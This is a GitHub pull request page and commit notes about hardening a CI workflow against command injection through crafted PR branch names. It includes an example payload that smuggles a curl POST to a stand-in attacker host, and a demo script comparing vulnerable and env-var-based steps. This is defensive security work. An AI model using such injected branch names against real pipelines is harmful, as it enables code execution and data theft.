Conversation

Contributor

@ikraemer-dd ikraemer-dd commented Sep 29, 2025

Summary of changes

Update delete-pr-image workflow to only run on sanitized inputs.

@ikraemer-dd ikraemer-dd force-pushed the ikraemer/workflow-sanitization branch from 829f5e1 to 91f78e3 on September 29, 2025 15:29
@github-actions github-actions bot added the area:builds project files, build scripts, pipelines, versioning, releases, packages label Sep 29, 2025
@ikraemer-dd ikraemer-dd changed the title wip [SINT-2273] update workflow stpes Sep 29, 2025
@ikraemer-dd ikraemer-dd changed the title [SINT-2273] update workflow stpes [SINT-2273] update workflow steps Sep 29, 2025
@ikraemer-dd ikraemer-dd marked this pull request as ready for review September 29, 2025 15:32
@ikraemer-dd ikraemer-dd requested a review from a team as a code owner September 29, 2025 15:32
@ikraemer-dd ikraemer-dd force-pushed the ikraemer/workflow-sanitization branch from 91f78e3 to 91a8a5e on September 29, 2025 15:59
Collaborator

@bouwkast bouwkast left a comment

Thanks!

@ikraemer-dd ikraemer-dd enabled auto-merge (squash) September 29, 2025 16:05
@ikraemer-dd ikraemer-dd merged commit a4a4ce0 into master Sep 29, 2025
93 of 97 checks passed
@ikraemer-dd ikraemer-dd deleted the ikraemer/workflow-sanitization branch September 29, 2025 16:16
@github-actions github-actions bot added this to the vNext-v3 milestone Sep 29, 2025
bouwkast pushed a commit that referenced this pull request Sep 30, 2025
## Summary of changes

Follow-up of #7579

## Reason for change

`upload_container_images.upload` job is executed for PR (with a specific
label). An attacker can create a PR with a carefully crafted branch name that
can result in command injection. Such a branch name can be
`test\",\"malicious\":\"$(curl -X POST https://attacker.com/steal-data)\"`

ikraemer-dd added a commit that referenced this pull request Oct 1, 2025
ikraemer-dd added a commit that referenced this pull request Oct 2, 2025
## Summary of changes
Follow-up of #7579
The method used in this PR is documented here
https://docs.github.com/en/actions/reference/security/secure-use#understanding-the-risk-of-script-injections
and is a safer way to mitigate possible injections.
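The commit message above describes the injection (a PR branch name carrying `$(curl ...)` that ends up inside a workflow `run:` script) and the follow-up points at the GitHub guidance of passing untrusted context through `env:` instead of inlining `${{ }}` expressions. The script below is an added example, not the dd-trace-dotnet workflow or any code from this PR: it emulates the runner's textual expansion of `${{ github.head_ref }}` into a shell step, shows the same step written the hardened way, and adds a constructed allowlist check that refuses to run the step on a ref containing shell metacharacters. The branch name, the step text and the allowlist pattern are all assumptions made for the demo; git itself accepts `$`, `(`, `)` and `"` in ref names, so such a branch can really be pushed.

```shell
#!/bin/sh
# Added example (not the project's workflow): reproduces the script-injection
# class from the commit message and the env-var mitigation from the linked
# GitHub docs. Branch name, step text and allowlist are constructed here.

# Constructed attacker-controlled branch name. git check-ref-format permits
# '$', '(' and ')' in ref names, so a PR from this branch is accepted.
ATTACKER_BRANCH='test$(echo INJECTED)'

# Vulnerable pattern: a step written as
#   run: echo "Deleting image for ${{ github.head_ref }}"
# The Actions runner substitutes the expression into the script *source*
# before the shell parses it. String concatenation below emulates that
# textual splice; the result is then handed to a fresh shell, exactly as the
# runner hands the generated script to bash/sh.
vulnerable_step() {
  script="echo \"Deleting image for $1\""
  sh -c "$script"
}

# Hardened pattern from the GitHub docs:
#   env:
#     HEAD_REF: ${{ github.head_ref }}
#   run: echo "Deleting image for $HEAD_REF"
# The untrusted value reaches the shell as an environment variable, i.e. as
# data, so "$(...)" inside it is echoed verbatim and never executed.
safe_step() {
  HEAD_REF="$1" sh -c 'echo "Deleting image for $HEAD_REF"'
}

# Belt and braces: refuse to run the step at all unless the ref matches a
# conservative allowlist (constructed; adjust to your branch-naming policy).
# Returns 0 when the ref is acceptable, 1 otherwise.
is_safe_ref() {
  printf '%s' "$1" | grep -Eq '^[A-Za-z0-9][A-Za-z0-9._/-]*$'
}

# Demo run.
echo "--- vulnerable step ---"
vulnerable_step "$ATTACKER_BRANCH"   # prints: Deleting image for testINJECTED
echo "--- hardened step ---"
safe_step "$ATTACKER_BRANCH"         # prints: Deleting image for test$(echo INJECTED)
echo "--- allowlist ---"
if is_safe_ref "$ATTACKER_BRANCH"; then
  echo "allowed (unexpected)"
else
  echo "rejected: $ATTACKER_BRANCH"
fi
```

The env-var form is the important half: it works regardless of what the branch name contains, because the shell never sees the value as source text. The allowlist is a second layer for steps that later pass the value to a tool that does its own parsing (an image tag, a JSON body built with string concatenation, as in the `\",\"malicious\":\"` payload above), where quoting in the shell alone is not enough. The same reasoning applies to every attacker-controlled context value, such as `github.event.pull_request.title` or the PR body, not only `github.head_ref`.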
Labels

area:builds project files, build scripts, pipelines, versioning, releases, packages area:docs
